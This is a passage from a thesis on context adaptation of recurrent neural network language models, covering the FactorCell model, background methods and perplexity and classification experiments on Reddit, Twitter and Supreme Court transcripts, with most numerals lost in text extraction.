and deployed, showing how adaptation can be effective in these scenarios as well. . key contributions the primary goal of this work is to increase the adaptability of recurrent neural network language models. our main contribution is to propose a novel mechanism, which we call the factorcell, for using a context embedding vector to transform the weights of the recur- rent layer. this is a fundamentally different way of adapting the recurrent layer. instead of viewing context as an additional input to the rnn, we create a function that uses con- text information to output the weights of a custom rnn that matches the given context. moreover, by using precomputation and caching techniques, the factorcell delivers superior adaptation at little to no extra computational cost. we demonstrate the superiority of the factorcell model over commonly used methods for rnn adaptation, including several recent approaches that do not adapt at the recurrent layer, preferring to focus on the output bias vector. experiments on nine datasets with varying domains, contexts, and model and vocabulary sizes confirms that adapting the recurrent layer always helps. we also show that our model beats the current standard method of adapting the recurrent layer. the extensive experimentation leads to some useful observations for predicting when context conditioning will be more or less successful for a given dataset. the many prior use cases for adaptation mentioned in section . all have in common the requirement that all contexts be known during training. another contribution is to introduce an online learning method for adapting to contexts that emerge after the model has been deployed. online learning improves the quality of the adaptation and also widens the set of possible applications. we use a personalized query auto-completion task to demonstrate how this method can be successfully used. again, our factorcell model beats the standard approach to adaptation and the performance gap widens as more data becomes available over time. adaptation is vital for language models to work in real world applications. we show how the factorcell model impacts multiple applications and discuss potential implications for many more. the first application is the just mentioned personalized query completion. another important application is context-specific or controllable text generation. we show how the factorcell model is significantly more controllable than the standard adaptation methods. the gap between our model and the standard approach is not easily closed even when we give the baseline an advantage by doubling the dimensionality of its recurrent layer. automatic evaluation of context-specific text generation can be difficult. we propose a metric based on text classification that is predictive of human ratings for text generation performance and avoids many of the headaches of prior evaluation techniques. for both the query completion and text generation applications we show through analysis that the factorcell model has qualitative benefits that are not fully captured by perplexity as an evaluation criterion. . thesis overview the remainder of the thesis proceeds as follows. in chapter , we provide background information on language modeling and adaptation. we review relevant prior work in these areas including the concatcell and softmaxbias models from mikolov and zweig ( ) that serve as the principal baselines for the rest of the thesis. in chapter , we show that the concatcell model is effectively a constant additive bias in the recurrent layer. we then explore trade-offs of different architectures for adapting at the recurrent layer and the output layer. we make some observations about what factors make a dataset more or less amenable to adaptation. in chapter , we introduce the factorcell, a more powerful model for rnn adaptation. by controlling the rank of a low-rank context-dependent weight transformation, the fac- torcell can be adjusted to allow for more or less sharing of information between contexts depending on the situation. this model remedies the prominent weakness of the concat- cell, namely, that it often does not allow its predictions to be changed enough in response to context. we show that the factorcell beats the concatcell in terms of perplexity and that it also does better at capturing the relationship between context and language in text classification experiments. in chapter , we introduce an approach for adapting to new contexts that emerge after the model has been trained and deployed, and apply the factorcell model to the task of personalized query auto-completion. the key result is that stronger adaptability at the recurrent layer enables the model to better take advantage of information from new users’ query histories to personalize their predictions. chapter deals with the use of language model adaptation for context-specific text generation. we measure context-specificity by checking if the text sampled from or generated by the model matches the properties of the specified context. we show that when the adaptation is weaker (as in the concatcell) then context-specificity suffers; the factorcell model gives clear wins for context-specificity. we propose a metric based on text classification that is predictive of human ratings for text generation performance and avoids many of the headaches of prior evaluation techniques. finally, chapter concludes the thesis by summarizing the contributions and suggesting future directions for additional research. chapter background this chapter gives the necessary background information on language modeling and prior literature on adaptation. the contributions of the thesis build on these ideas. . general language modeling background language models compute a probability distribution over word sequences w :n where each wi is drawn from a vocabulary v . typically, the probability is factored using the chain rule: p(w :n) = p(w ) ∏n i= p(wi|w :i− ). the w :i− term is often referred to as the history. dealing with data sparseness is fundamental to language modeling because there will always be many valid word sequences that are not observed in the training data. one way to categorize language models is to look at how they deal with the sparseness or generalization problem: n-gram models use a back-off strategy, maximum entropy models rely regularization techniques, and the different classes of neural networks generalize by finding low dimensional continuous space representations of language. in the basic n-gram language model only the most recent n− words from the history are considered (bahl et al., ). in the common case that n = , known as a trigram model, p(wi|w :i− ) is approximated as p(wi|wi− ,wi− ). even with this simplifying assumption, sparseness is a problem. estimating the parameters of an n-gram language model using maximum likelihood fails to assign proper estimates to the n-grams that are unobserved in the training data, and there will be many such n-grams. the remedy is to borrow from the probability mass given to some of the observed n-grams and distribute it to unobserved ones (katz, ). the redistribution is done recursively, reducing the size of the n-gram history in each step. the methods used for the back-off smoothing has been improved over time (kneser and ney, ; ?), but the basic idea has remained the same. one improvement was to add skip-grams, which are like n-grams except they can skip over some words to look farther back in the history (siu and ostendorf, ; shazeer et al., ). a variant of skip-grams is to identify long range triggers such as by using information from a syntactic parse (bellegarda, ). the class language model is an extension of the standard n-gram model that operates on a set of word equivalence classes (brown et al., ). for a trigram, the probabilities are factored as p(wi|wi− ,wi− ) = p(wi|ci)p(ci|ci− ,ci− ). the use of classes reduces the effective size of the vocabulary when estimating p(ci|ci− ,ci− ) and thereby improves the reliability of those estimates and possibly allowing for use of a higher n-gram order. this is the advantage of the class language model formulation. however the gain in reliability is associated with a loss of detail that can lead to mixed results. the difficulty, for several decades, in finding a practical improvement over n-gram lan- guage models, despite their obvious weaknesses, was described as being a “source of consid- erable irritation” to researchers in the field (jelinek, ). a decade later, rosenfeld ( ) calls it ironic that “the most popular language models (n-grams) take no advantage of the fact that what’s being modeled is language.” and yet, even now with many alternatives to choose from, n-gram models continue to be heavily used. their strengths are that they make few assumptions other than the markov property, training the models is as fast as counting n-grams, and they use a vast number of parameters to memorize idiomatic and exceptional expressions. . . vocabulary & input representation an important design choice in language modeling is to define the vocabulary. typically, the vocabulary is set by taking the set of all words that appear at least k times in the training corpus for some small k. over time, as more powerful computers and bigger text corpora became available, the typical vocabulary size used in applications has likewise increased. figure . shows the change in vocabulary size for large vocabulary continuous speech recog- nition systems over time with a doubling in vocabulary size approximately every four years. similar increases are observed for other applications. figure . : vocabulary size in large vocabulary continuous speech recognition systems over time. exploding vocabulary sizes lead to exponential growth in model size and exponential increases in the time required for speech decoding. this trend is obviously not sustainable. dealing with the exponential growth is a challenge but also an opportunity for considerable amounts on innovation. research is proceeding into neural systems that can decode audio directly into text one character at a time (graves and jaitly, ; chan et al., ; bahdanau et al., ; maas et al., ). the language model can be a character n-gram model trained separately or an lstm that is part of the larger neural network and trained end-to-end. when training end- to-end, the objective is to minimize the error rate instead of aiming to minimize perplexity. machine translation is also moving away from using word-based language models (lee et al., ; chung et al., ). google’s machine translation system uses a small vocabulary of around , tokens that are a mix of words and subwords (wu et al., ). character-based models are far from a new concept. subword models have found use before especially when working with highly inflected or low-resource languages (tucker et al., ; creutz et al., ; saraçlar et al., ); however, there has been a recent surge of interest in character- and subword-based models. this thesis makes a point of testing on both word- and character-level models so as to have maximum impact on future applications. . . evaluation & metrics language model evaluation is often done on a held-out test set using perplexity as a metric: perplexity = exp(− n n∑ i= log p(wi)). ( . ) see equation . . perplexity was always recognized as a “crude” metric (jelinek, , ) but is still widely used because it offers a quick and easy task-independent way of evaluating a language model. perplexity is not the only factor that matters when comparing models, however. models can be interesting for other reasons such as speed (brants et al., ). in some cases, the models are evaluated using downstream metrics like word error rate in speech recognition or bleu score in machine translation (kirchhoff and yang, ) instead of using perplex- ity. for text generation, human evaluations can be high quality but are costly to perform. perplexity will be the main evaluation metric used in this thesis due to the desire to be task-independent and the need to control costs, but some experiments with other metrics are included. recently, some language modeling papers have used “dynamic evaluation”, whereby the model is allowed to continue to train on the test data after making predictions for each segment (krause et al., ). this is a form of online updating and it helps to adapt to shifts between the training and the test data. dynamic evaluation makes less sense for certain applications such as speech recognition because it can reinforce errors in the transcription. language models can be fairly compared without the use of dynamic evaluation. thus, we do not make use of it in this thesis except that we do use a form of online updating for one of our experiments that will be introduced in chapter , where the application makes sense. . neural language modeling continuous-space language models such as the neural probabilistic language model (ben- gio et al., a) obtain an advantage over n-gram models because they share information between n-grams by projecting to a low-dimensional continuous space. recurrent neural network (rnn) language models (mikolov et al., ) extend that advantage by permitting the incorporation of information from arbitrarily long word histories. the rnn language model in its basic form has three layers: an input layer, a recurrent layer, and an output layer. the input layer learns a word embedding matrix e ∈ rp×|v | that consists of a p- dimensional vector for each word in the vocabulary v . if the input w ,w , . . .wn is rep- resented as one-hot encoded vectors then multiplying by e gives a sequence of word em- beddings, ew ,ew , . . .ewn = ew ,ew , . . .ewn. the recurrent layer uses a weight matrix w ∈ rq×(p+q) and a bias vector b ∈ rq to transform the word embedding for the current step ewt and its own output from the previous step ht− into a hidden state vector ht that summarizes the sequence up to that point. the formula is given by equation . where σ is the activation function, typically the hyperbolic tangent or a restricted linear unit (relu): ht = σ(w[ewt,ht− ] + b ). ( . ) the output layer uses the hidden state vector ht to estimate a probability distribution yt over the vocabulary for wt+ : yt = softmax(e tht + b ). ( . ) the bias vector b ∈ r|v | acts as a prior on the unigram distribution and is a crucial part of the output layer. if the word embedding size p is not the same as the recurrent layer dimensionality q then a linear projection can be inserted and the word embedding matrix e from the input layer can be reused in the output layer to save on parameters and increase generalizability (press and wolf, ; inan et al., ). in this case, the equation for the output layer would be yt = softmax(e t pht + b ). the parameters of the model, e, w, b , and b , can all be learned jointly via backpropagation through time towards the objective of maximizing the likelihood of the data. one limitation of neural language models, as originally proposed, is that the training time scales poorly with the size of the vocabulary. a variety of techniques were developed as workarounds. neural models were trained to predict only the words from a subset of the vocabulary known as a shortlist (schwenk, ), and the predictions from the neural model were interpolated with an n-gram model that could handle a full-sized vocabulary. shortly thereafter, hierarchical neural models were developed. these train faster with only a small decrease in perplexity (morin and bengio, ). techniques such as importance sampling (bengio et al., b) and noise contrastive estimation (mnih and kavukcuoglu, ) make it possible to quickly train full size vocabulary models without a hierarchy. the method used for training large vocabulary models in this thesis is the sampled softmax from jean et al. ( ). the sampled softmax constrains the vocabulary to a small random subset when computing the loss for each sequence avoiding the need to backpropagate to the full vocabulary for every weight update. for a thorough review of methods for training large vocabulary neural language models, see (chen et al., ). the basic rnn has a flaw known as the vanishing/exploding gradient problem that pre- vents it from learning to use information from far back in the history (pascanu et al., ). in practice, this is mitigated by using alternate architectures such as long short-term memory (lstm) or the gated recurrent unit (gru) (sundermeyer et al., ). these architectures use gating mechanisms to control the flow of information and importantly they permit the preservation of information from the hidden state over time. our experiments make exten- sive use of these rnn variants. other techniques have been developed to further increase the stability of the rnn. in some of our experiments, we make use of layer normalization which involves normalizing the first and second moments of the w[ewt,ht− ] + b term in equation . (ba et al., ). in the early s it was noted that n-gram language models benefit from boosting the probability of words observed in previous utterances or in earlier parts of a document because word usage is “bursty” (jelinek et al., ). once a word is observed in a given document, the probability of seeing it again is greatly increased. models that boost the probability of recently seen words are called cache language models (kuhn and de mori, ). these techniques have been extended to rnn language models by allowing the model to look back at the previous hidden states from the same sentence or document (merity et al., b; grave et al., a). usually, state-of-the-art language modeling results are reported both with and without the inclusion of a cache, e.g. merity et al. ( a), because the gain from a cache is considered to be orthogonal to other modeling improvements. the experiments in this thesis are reported without the inclusion of a cache in order to focus on our contributions to adaptation. . language model adaptation there is a long history of adapting n-gram language models starting from early work on mixture modeling (demori and federico, ; bellegarda, ). since this thesis builds on neural models, the review of prior work will only cover these methods. the long-established mixture techniques also apply to neural network models (irie et al., ), but our focus is on techniques that are specific to neural network adaptation. we are most interested in cases with explicit representations of context, however, one adaptation method, model fine-tuning, does not require the use of a context embedding. the language model is first trained on general background data and then learning is briefly continued on smaller in-domain data to “fine-tune” the weights (gangireddy et al., ; zhang et al., ). fine-tuning suffers from the possibility of catastrophic forgetting, where the model loses access to the information it learned from training on the background data (goodfellow et al., ). one way of dealing with catastrophic forgetting is to freeze portions of the model during fine-tuning. some approaches combine fine-tuning with the addition of a new linear transformation in between the hidden and output layers (deena et al., ), or occasionally a non-linear transformation is used instead (ma et al., ). this is motivated in part by similar approaches for adapting acoustic models in speech recognition (gemello et al., ). adaptation of neural language models has two parts: representing context information and using the context representation to alter the model predictions. we discuss these next. . . context representations for neural language model adaptation, context information is typically represented as an embedding vector. neural networks have the advantage in that they are quite versatile in the types of inputs that they can accept. another advantage is that the network can learn the context representations as part of the end-to-end language modeling task. some of the types of context that could be or have been used are . topic model vectors that summarize the topic of long documents (mikolov and zweig, ). . context is the title of a ted talk and it is represented as an embedding using either bag-of-words features or using an rnn or cnn (hoang et al., ). . context is a one-hot encoded vector indicating an amazon product identifier and an- other one-hot vector indicating the sentiment of a review of that product (tang et al., ). the context information can be categorical, numeric, textual information, or a combina- tion of these. it could even be composed of attributes that are predicted using a machine learning system based on other features. the majority of experiments in this thesis use categorical context variables but the methods all apply to other cases. we assume the availability of contextual information (metadata or other side information) that is represented as a set of context variables f :n = f ,f , . . .fn, from which we produce a k-dimensional representation in the form of an embedding, c ∈ rk. each of the context variables, fi, represents some type of information or metadata about the sequence and can be either categorical or numerical. we adopt the strategy from tang et al. ( ) of combining information from multiple context variables using a simple neural network. this strategy is well-suited for the types of context variables that we will see in our experiments, particularly high dimensional contexts such as hotel identity in a review or user identity in a query completion task. for each context variable fi, we learn an associated embedding matrix fi, i = , . . . ,n. if n = then the embedding can directly be used as the context representation. otherwise, a single layer neural network is used to combine the embeddings from the individual variables. c = tanh( ∑ i mififi + b ) ( . ) in some cases the tanh activation function is replaced with the relu function instead. mi and b are parameters learned by the model. the context embedding, c, is used for adapting both the hidden and the output layer of the rnn. . . adaptation mechanisms mikolov and zweig ( ) were the first to propose a method for adapting rnn language models by augmenting both equations . and . with an extra term. the adaptation depends on having a summary of the context information contained in an embedding vector c ∈ rk. to adapt the recurrent layer they concatenate the context embedding c with the word embedding at every step of the input, which we show in the next chapter is equivalent to an additive context-dependent bias. we refer to this form of adaptation as the concatcell. ht = σ(w[ewt,ht− ,c] + b ). ( . ) to adapt the output layer, an adaptation term gc is added, yt = softmax(e tht + gc + b ), ( . ) which has the effect of altering the softmax bias in a context dependent way. we refer to models that use this form of adaptation as the softmaxbias model. softmaxbias adaptation appears to be a reasonable approach in cases where the context concerns topic, since we know that the unigram distribution is often sufficient to capture topical information. as we will show later on, softmaxbias adaptation alone is not sufficient to get the best results. this is particularly obvious when dealing with character-level models, where the unigram distribution carries little information about topic or style. in the special case where the context variable is discrete and of low cardinality then the bias vector can be adapted by directly learning independent bias vectors for each context, i.e. replacing the context embedding c with a one-hot encoded vector. when the cardinality of the context variables is high then learning independent bias vectors carries a high memory cost. although it is not often framed in this way, the gc term acts as a low-rank approxi- mation to the strategy of learning independent bias vectors. we will use both strategies in this thesis, as the situation warrants. these two adaptation strategies have been adopted for a variety of tasks, including per- sonalization, adapting to television show genres (chen et al., ), adapting to long range dependencies in a document (ji et al., ), etc. see table . for a listing of more prior work, showing which of these methods were employed. as shown in the table, a variety of contexts have been used. topic based adaptation is popular but categorical variables are also used like product identity or sentiment level. when doing personalization, the context can be an identifier for the person (li et al., ), or alternatively the information can be given as a bag-of-words representation of the persons prior utterances or writings (wen et al., ). few studies have tested the relative merits of adapting at the recurrent layer versus the output layer. ji et al. ( ) compares the two approaches, which they refer to as ccdclm m o d e l c c s b c o n te x t t o p ic r n n (d ie n g et a l. , ) x t o p ic m o d el c o n te x t a w a re g en er a ti o n (t a n g et a l. , ) x p ro d u ct id en ti ty a n d se n ti m en t g en er a ti v e t ex t c la ss ifi ca ti o n (y o g a ta m a et a l. , ) x m is ce ll a n eo u s c o n tr o ll in g s ty le in t ex t g en er a ti o n (f ic le r a n d g o ld b er g , ) x m o v ie re v ie w st y li st ic fe a tu re s c o n te x t d ep en d en t l m (m ik o lo v a n d z w ei g , ) x x t o p ic m o d el l a n g u a g e m o d el p er so n a li za ti o n (w en et a l. , ) x x s o ci a l m ed ia te x t m u lt i- g en re s p ee ch r ec o g n it io n (c h en et a l. , ) x x t o p ic m o d el c o n te x tu a l l s t m (g h o sh et a l. , ) x t o p ic m o d el p er so n a b a se d c o n v er sa ti o n (l i et a l. , ) x p er so n a li ze d re sp o n se g en er a ti o n f ea tu re -b a se d r n n l m a d a p ta ti o n (d ee n a et a l. , ) x m u lt i- g en re b ro a d ca st sp ee ch t a b le . : a p p ro a ch es to r n n la n g u a g e m o d el a d a p ta ti o n in p ri o r w o rk . t h e x in d ic a te s th e u se o f th e c o n ca tc el l (c c ) o r th e s o ft m a x b ia s (s b ) a d a p ta ti o n st ra te g y . and codclm. they find that both give similar perplexities. softmaxbias wins by % on one dataset and by less than % on the other. however, adapting the recurrent layer does better at an auxiliary sentence ordering task. differences between models that are more prominent in other metrics besides perplexity is a theme that we will return to later on in the thesis. they do not test any models that adapt both the recurrent and output layers. hoang et al. ( ) also consider adapting at the hidden layer vs. at the softmax layer. they report a small advantage towards adapting the output layer but the comparison is only made on a single dataset. it should be noted that not all models fit cleanly into the above framework, although it is the dominant paradigm. the (hoang et al., ) model differs from the softmaxbias approach because it use an extra perceptron layer in the output. luan et al. ( ) use the recurrent layer bias approach plus an extra context-dependent linear projection in between the recurrent and the output layer. wen et al. ( ) uses a custom gating architecture to adapt to dialogue states. chapter exploring context-aware rnns in this chapter , we show that the popular rnn hidden layer adaptation strategy de- scribed in the previous chapter corresponds to a static additive bias term. then, we study the impact of adapting rnns at the recurrent layer versus the output layer using different architectures and techniques. starting with the unadapted rnn that makes no use of con- text information, we consider two mechanisms each of adapting the recurrent layer and the output layer respectively. one of the methods for adapting the recurrent layer is a novel mul- tiplicative rescaling of the hidden state dimensions. using experiments on three datasets, we make some observations about what factors make a dataset more or less amenable to adap- tation. these studies provided the groundwork that led to the proposal of the factorcell model. . additive bias adaptation as described in section . . , the standard approach to recurrent layer adaptation is to include (via concatenation) the context embedding as an additional input to the recurrent layer. when the context embedding is constant across the whole sequence, it is easy to show that this concatenation is equivalent to using a context-dependent bias at the recurrent layer: ht = σ(ŵ[ewt,ht− ,c] + b ) = σ(w[ewt,ht− ] + qc + b ) = σ(w[ewt,ht− ] + b ′ ), ( . ) the content of this chapter draws from our previously published work (jaech and ostendorf, ) where ŵ = [w q] and b′ = qc + b is the context-dependent bias, formed by adding a linear projection of the context embedding. thus, for this scenario where the context only changes sporadically, concatenating the context embedding with the input to the recurrent layer is the same as using a context-dependent bias vector. some people perform the concatenation explicitly despite its inefficiencies compared to directly learning the context-dependent bias because modern deep learning libraries do not always make it easy to alter the internal workings of the rnn or lstm. . models we consider two methods each for adapting the recurrent and output layers respectively. in total there are = total possible models that can be constructed by enabling or disabling each of the four adaptations. all of the models with adaptation incorporate a context embedding c using the method described in section . . . . . adapting the recurrent layer we consider two methods for adapting the recurrent layer. the first is the concatcell from equation . . it can be implemented by simply concatenating the context vector c with the word embedding ewt at each timestep at the input to the recurrent layer, but the effect of this adaptation is to apply a linear additive shift to the recurrent layer bias. to increase the adaptability of the hidden layer, we introduce a context-dependent multi- plicative rescaling of the hidden layer weights. the method is inspired from ha et al. ( ), where a similar multiplicative scaling is used to dynamically adjusting the parameters of a language model in response to the previous words in the sentence. using this row rescaling technique on top of the additive adaptation from equation . , the equation becomes ht = σ(cc�w[ewt,ht− ] + qc + b ) ( . ) where c ∈ rq×k is a new model parameter and � is the elementwise multiplication operator. the element-wise multiplication is a low-cost operation and can even be pre-calculated so that model evaluation can happen with no extra computation compared to a vanilla rnn. . . adapting the output layer one way of adapting the output layer is to let each context have its own bias vector. this requires the use of a matrix of size |v | × |c|, where |v | is the size of the vocabulary and |c| is the total number of possible contexts. this may be intractable when both |v | and |c| are large. mikolov and zweig ( ) use a low-rank factorization of the adaptation matrix, replacing the |v |×|c| matrix with the product of a matrix g of size |v |×k and a context embedding c of size k. yt = softmax(e tht + gc + b ) ( . ) the total number of parameters is now a much more manageable o(|v | + ∑ i |ci|) instead of o( ∑ i |v ||ci|), where ci is the cardinality of the i-th context variable. the advantage of a low-rank adaptation is that it forces the model to share information between similar contexts. the disadvantage, is that important differences between similar contexts can be lost. we employ feature hashing to reduce the memory requirements but retain some of the benefits of having an individual bias term for each context-word pair. the context-word pairs are hashed into buckets and individual bias terms are learned for each bucket. the hashing technique relies on having direct access to the context variables f :n. representing context as a latent topic distribution precludes the use of this hashing adaptation. the choice of hashing function is motivated by what is easy and fast to perform inside the tensorflow computation graph framework . if w is a word identifier (id) and f :n are context variable id’s, then the hash table index is computed as hi(w,fi) = wr + firi mod l ( . ) where l is the size of the hash table and r and the ri’s are all fixed random integers. the newer versions of tensorflow make it easier to do feature hashing than what we describe here. value of l is usually set to a large prime number. the function h : z → r maps hash indices to hash values and is implemented as a simple array. since l is much smaller than the total number of inputs, there will be many hash collisions. hash collisions are known to negatively effect the perplexity (mikolov et al., ). to deal with this issue, we restrict the hash table to context-word pairs that are observed in the training data. a bloom filter data structure records which context-word pairs are eligible to have entries in the hash table. the design of this data structure trades off a compact representation of set membership against a small probability of false positives (bloom, ; talbot and brants, ; xu et al., ). a small amount of false positives is relatively harmless in this application, because they do not impair the ability of the bloom filter to eliminate almost all of the hash collisions. the function β : z → [ , ] is used by the bloom filter to map hash indices to binary values. b(w,fi) = ∏ j= β(hi,j(w,fi)) the hash functions hi,j are defined in the same way as the hi’s above except that they use distinct random integers and the size of the table, l, can be different. because β is a binary function, the product b(w,fi) will always be zero or one. thus, any word-context pairs not found in the bloom filter will have their hash values set to zero. the final expression for the hashed adaptation term is given by hash(w,f :n) = n∑ i= h(hi(w,fi))b(w,fi) ( . ) yt = softmax(e tht + gc + b + hash(wt,f :n)) ( . ) . data the experiments make use of three corpora chosen to give a diverse perspective on adaptation in language modeling. summary information on the training set for each source (reddit, twitter, and scotus) is provided in table . and each source is discussed individually source size vocabulary context (dimensions) reddit , k , words subreddit ( ) twitter k chars language ( ) scotus k , words case ( ), speaker ( ), role ( ) table . : number of sentences, vocabulary size and context variables for the three corpora. below. the reddit and scotus data are tokenized and lower-cased using the standard nltk tokenizer (bird et al., ). reddit reddit is the world’s largest online discussion forum and is comprised of thousands of active subcommunities dedicated to a wide variety of themes. our training data is million sentences ( million words) from reddit comments during the month of april . only the first sentence from each comment was used. the , word vocabulary is selected by taking all tokens that occur at least times in the training data. the remaining tokens are mapped to a special unk token leaving us with an out of vocabulary rate of . %. the validation data and test data are each contain one eighth the number of sentences as the training data. the context variable is the identity of the subreddit, i.e. community, that the comment came from. there are , subreddits with at least training sentences. the remaining ones are grouped together in an unk category. the largest subreddit occupies just . % of the data. by using a large number of subreddits, we highlight an advantage of model adaptation which is to be able to use a single unified model instead of training thousands of separate models for each individual community. similarly, using context dependent bias vec- tors for this data instead of the hash adaptation would require learning million additional parameters. twitter the twitter training data has , tweets ( , words) each annotated with one of nine languages: english, german, italian, spanish, portuguese, basque, catalan, galician, and french. the corpus was collected by combining resources from published data for language identification tasks during the past few years. tweets labeled as unknown, ambiguous, or containing code-switching were not included. the data is unbalanced across languages with more than % of the tweets being spanish and the smallest four languages (italian, german, basque, and galician) each representing less than . % of the total. there are unique character tokens in the vocabulary. graphemes that are surrogate-pairs in the utf- encoding, such as emoji, are split into multiple vocabulary tokens. no preprocessing or tokenization is performed on this data except that newlines were replaced with spaces for convenience. the validation and test data have , and , tweets respectively. scotus approximately , utterances ( million words) of training data spanning arguments from - . these are speech transcripts from arguments before the united states supreme court. utterances are labeled with the case being argued (n= , ), the speaker id (n= , ), and the speaker role (justice, advocate, or unidentified). these three context variables are defined in the same way as in hutchinson et al. ( ), where a small portion of this data was used in language modeling experiments. the vocabulary size is around , words. utterances longer than words ( th percentile) were split into smaller utterances. the validation and test data were each one eighth the size of the training data. . experiments we used an lstm with coupled input and forget gates for a % reduction in computation time (greff et al., ). dropout was used as a regularizer on the input and outputs of the recurrent layer as described in zaremba et al. ( ). for the large vocabulary experiments, occasionally, the advocates go on for hundreds of words without interruption. including these utterances would slow down the training. parameter reddit scotus twitter batch size word embed. lstm size dropout % % % neg. samples na total params. m m k table . : summary of key hyperparamters we used a sampled softmax loss to speed up training. a summary of the key hyperparameters for each class of experiments is given in table . . we conducted some preliminary experiments to tune the different hyperparameters for each dataset. then, we fixed the values of these hyperparameters and only varied the adaptation method in each experiment. the total parameter column in this table is based on the unadapted model. adapted models will have more parameters depending on the type of adaptation. when using hash adaptation of the output layer, the size of the bloom filter is million and the size of the hash table is million. the model is implemented using the tensorflow library. optimization is done using adam with a learning rate of . . each model trained in under three days using cpu threads. although the model is trained as a language model, it can be used as a generative text classifier. the classification rule is given by argmaxfi ∑ j log p(wj|w :j− ,ck =i,fi). when there are multiple context variables, we treat all but one of them as known values and attempt to identify the unknown one. it is not necessary to compute the probabilities over the full vocabulary to do text classification. the sampled softmax criteria can be used to greatly speed up evaluation of the classifier provided that a) the same negative samples are reused for each class and b) the number of negative samples is increased to around % of the vocabulary. hidd. output × + lr hash ppl ∆ppl auc n n n n . – – n n n y . . % . n n y n . . % . n n y y . . % . n y n n . . % . n y n y . . % . n y y n . . % . n y y y . . % . y n n n . . % . y n y n . . % . y n y y . . % . y y n n . . % . y y n y . . % . y y y n . . % . y y y y . . % . table . : perplexities and classification avg. aucs for reddit models . . reddit experiments the size of the subreddit embeddings was set to . table . gives the perplexities and average aucs for subreddit detection for different adapted models. the evaluation data contains , sentences. for comparison, an unadapted -gram kneser-ney model trained on the same data has a perplexity of . the models with the best perplexity do not use multiplicative adaptation of the hidden layer, but it is useful in the detection experiments. we can inspect the context embeddings learned by the model to see if it is exploiting sim- pittsburgh python nba atlanta csharp warriors montana javascript rockets madisonwi cpp questions mavericks baltimore cpp nbaspurs table . : nearest neighbors to selected subreddits in the context embedding space. ilarities between subreddits in the way that we expect. table . lists the nearest neighbors by euclidean distance to three selected subreddits. the nearest neighbors are intuitively reasonable. for example, the closest subreddits to pittsburgh are communities created for other big cities and states. the python subreddit is close to other programming language communities, and the nba subreddit is close to the communities for individual nba teams. the number of subreddits is large enough that apply a generative classifier to the full set is impractical. we used a smaller subset of subreddit and to avoid bias picked the same ones used in another study (tran and ostendorf, ). this caused the classification task to turn into a detection one and therefore the decision rule is slightly different from what was described above. the subreddit detection involves predicting the subreddit a given comment came from with eight subreddits to choose from (askmen, askscience, askwomen, atheism, changemyview, fitness, politics, and worldnews) and nine distractors (books, chicago, nyc, seattle, explainlikeimfive, science, running, nfl, and todayilearned). to make a classification decision we evaluate the perplexity of each comment under the assumption that it belongs to each of the eight subreddits. we use z-score normalization across the eight perplexities to create a score for each class. the predictions are evaluated by averaging the auc of the eight individual roc curves. the best model for the classification task uses all four types of adaptation. the multiplicative adaptation of the hidden layer is clearly useful for classification even though it does not help with perplexity. the perplexities for selected large subreddits are listed in table . . it can be seen that the relative gain from adaptation is largest when the topic of the subreddit is more narrowly focused. the biggest gains were achieved for subreddits dedicated to specific sports, tv shows, or video games. whereas, the gains were smallest for subreddits like videos or funny for which the content tends to be more diverse. the knowledge that a sentence came from a pro-wrestling subreddit effectively provides more information about the text than the analogous piece of knowledge for the pics or videos subreddit. this would seem to indicate that further gains could be possible if additional contextual information could be provided. an alternative explanation, that subreddits with fewer sentences in the training data receive more benefit from adaptation, is not supported by the data. . . twitter experiments the twitter evaluation was done on a set of , tweets. the language context embedding vector dimensionality was set to . when both the vocabulary and the number of contexts are small, as in this case, there is no danger of hash collisions. we disable the bloom filter making the hash adaptation essentially equivalent to having context-dependent bias vectors. table . reports the results of the experiments on the twitter corpus. we compute both the perplexity and measure the performance of the models on a language identification task. in terms of perplexity, the best models do not make use of the multiplicative hidden layer adaptation, consistent with the results from the reddit corpus. in general, the improvement in perplexity from adaptation is small (less than %) on this corpus compared to our other experiments where we saw relative improvements two to four times as big. this is likely because the lstm can figure out by itself which language it is modeling early on in the sequence, capture that in the hidden state, and adjust its predictions accordingly. our best model, using multiplicative adaptation of the hidden layer, achieves an accuracy of . % on this task. that is a % relative reduction in the error rate from the best model without multiplicative adaptation. sometimes there can be little to no perplexity improvement between the unadapted and adapted models. this can be explained if the provided context variables are mostly redundant subreddit base. ppl adapt. ppl ∆ppl description flashtv . . . % a popular tv show shield . . . % a tv show globaloffensive . . . % a pc video game nba . . . % national basketball association squaredcircle . . . % professional wrestling fitness . . . % exercise and fitness hockey . . . % professional hockey leagueoflegends . . . % a pc video game pcmasterrace . . . % pc gaming nfl . . . % national football league askwomen . . . % questions for women news . . . % general news stories and discussion worldnews . . . % global news discussion askmen . . . % questions for men gaming . . . % general video games interest group pics . . . % funny or interesting pictures videos . . . % funny or interesting videos funny . . . % sharing humorous content table . : comparison of perplexities per subreddit hidden output × + lr hash ppl acc. f n n n n . – – n n n y . . . n n y n . . . n n y y . . . n y n n . . . n y n y . . . n y y n . . . n y y y . . . y n n n . . . y n n y . . . y n y n . . . y n y y . . . y y n n . . . y y n y . . . y y y n . . . y y y y . . . table . : results on twitter data. given the previous tokens in the sequence. to investigate this further, we trained a logistic regression classifier to predict the language using the state from the lstm at the last time step on the unadapted model as a feature vector. using just labeled examples per class it is possible to get . % accuracy. furthermore, we find that a single dimension in the hidden state of the unadapted model is often enough to distinguish between different languages even though the model was not given any supervision signal. this finding is consistent with previous work that showed that individual dimensions of lstm hidden states can be strong indicators of concepts like sentiment (karpathy et al., ; radford et al., ). figure . visualizes the value of the dimension of the hidden layer that is the strongest indicator of spanish on three different code-switched tweets. code-switching is not a part of the training data but it provides a compelling visualization of the ability of the unsupervised model to quickly recognize the language. the fact that it is so easy for the unadapted model to pick-up on the identity of the contextual variable fits with our explanation for the small relative gain in perplexity from the adapted models in these two tasks. figure . : the value of the dimension of the lstm hidden state in an unadapted model that is the strongest indicator for spanish text for three different code-switched tweets. . . scotus experiments table . lists the results for the experiments on the scotus corpus. the size of the context embeddings are , , and for the case, speaker, and role variables respectively. for calculating perplexity we use a , sentence evaluation set. for the classification experiment we selected , sentences from the test data from eleven different justices and attempted to classify the identity of the justice. the perplexity of the distribution of judges over those sentences is . ( . would be uniform). so, the data is roughly balanced. when classifying justices, the model is given the case context variable, but we do not make any special effort to filter candidates based on who was serving on the court during that time, i.e. all eleven justices are considered for every case. for both the perplexity and classification metrics, the hash adaptation makes a big dif- ference. the model that uses only hash adaptation and no hidden layer adaptation has a better perplexity than any of the model variants that use both hidden adaptation and low-rank adaptation of the output layer. to ascertain which of the context variables have the most impact, we trained additional models with using different combinations of context variables. the model architecture is the one that uses all four forms 